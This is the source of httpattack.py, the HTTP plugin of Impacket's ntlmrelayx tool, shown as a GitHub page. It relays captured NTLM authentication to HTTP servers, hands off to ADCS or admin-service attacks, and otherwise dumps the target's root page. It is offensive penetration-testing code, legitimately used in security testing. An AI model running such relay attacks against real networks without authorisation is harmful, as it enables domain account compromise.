-
Notifications
You must be signed in to change notification settings - Fork 3.5k
/
httpattack.py
48 lines (42 loc) · 1.71 KB
/
httpattack.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
# Impacket - Collection of Python classes for working with network protocols.
#
# Copyright (C) 2022 Fortra. All rights reserved.
#
# This software is provided under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Description:
# HTTP Attack Class
# HTTP protocol relay attack
#
# Authors:
# Alberto Solino (@agsolino)
# Dirk-jan Mollema (@_dirkjan) / Fox-IT (https://www.fox-it.com)
# Ex Android Dev (@ExAndroidDev)
from impacket.examples.ntlmrelayx.attacks import ProtocolAttack
from impacket.examples.ntlmrelayx.attacks.httpattacks.adcsattack import ADCSAttack
from impacket.examples.ntlmrelayx.attacks.httpattacks.adminserviceattack import ADMINSERVICEAttack
PROTOCOL_ATTACK_CLASS = "HTTPAttack"
class HTTPAttack(ProtocolAttack, ADCSAttack):
"""
This is the default HTTP attack. This attack only dumps the root page, though
you can add any complex attack below. self.client is an instance of urrlib.session
For easy advanced attacks, use the SOCKS option and use curl or a browser to simply
proxy through ntlmrelayx
"""
PLUGIN_NAMES = ["HTTP", "HTTPS"]
def run(self):
if self.config.isADCSAttack:
ADCSAttack._run(self)
elif self.config.isADMINAttack:
ADMINSERVICEAttack._run(self)
else:
# Default action: Dump requested page to file, named username-targetname.html
# You can also request any page on the server via self.client.session,
# for example with:
self.client.request("GET", "/")
r1 = self.client.getresponse()
print(r1.status, r1.reason)
data1 = r1.read()
print(data1)